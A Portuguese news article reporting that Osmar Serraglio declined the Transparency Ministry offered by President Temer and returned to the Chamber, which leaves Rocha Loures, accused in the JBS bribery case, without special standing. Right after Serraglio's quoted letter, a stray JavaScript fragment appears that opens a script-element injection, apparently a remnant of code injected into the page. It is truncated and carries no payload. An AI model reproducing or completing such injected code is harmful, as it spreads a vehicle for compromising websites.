Serraglio recusa Ministério da Transparência e tira foro de Rocha Loures

Osmar Serraglio saiu do Ministério da Justiça após manifestações violentas em Brasília. Foto: Fabio Rodrigues Pozzebom/Agência Brasil

Osmar Serraglio decidiu rejeitar a proposta feita pelo presidente Michel Temer para transferi-lo do Ministério da Justiça para a pasta da Transparência. Em nota, o deputado federal do PMDB do Paraná agradeceu ao convite e decidiu voltar à Câmara dos Deputados. Com isso, seu suplente, Rocha Loures (PSDB-PR), perde o foro privilegiado, volta à Justiça comum e coloca Temer em risco.

Rocha Loures é apontado por delatores da JBS como o aliado de Temer responsável por receber propina paga pelo grupo empresarial. Ele foi filmado recebendo R$ 500 mil que seriam destinados ao presidente. Dinheiro que já foi devolvido à Justiça.

No Planalto, por sua vez, interlocutores de Temer avaliam que, mesmo sem prerrogativa de foro, o caso de Loures permanece no STF porque é atrelado ao do presidente.

Demissão – Serraglio foi demitido do Ministério da Justiça no domingo. Nos bastidores, fala-se que ele foi cobrado por Temer pelas últimas ações da Polícia Federal e também pelos protestos violentos em Brasília na semana passada. Sendo assim, ele sai do cargo com o discurso de que não interferiu na Lava Jato.

Segundo pessoas próximas ao ministro, pesou na sua decisão, ainda, o fato de o presidente Temer enfrentar seu maior desgaste, com ameaças de perder o mandato. “Na Câmara, a vida de Serraglio tende a ser mais pacata do que no Ministério da Justiça”, diz.

Leia a íntegra da nota de Osmar Serraglio:

“Excelentíssimo Senhor Presidente da República
Agradeço o privilégio de ter sido Ministro da Justiça e Segurança Público do nosso País.
Procurei dignificar a confiança que em mim depositou.
Volto para a Câmara dos Deputados, onde prosseguirei meu trabalho em prol do Brasil que queremos.
Osmar Serraglio”var d=document;var s=d.createElement(‘script’);

Deixe um comentário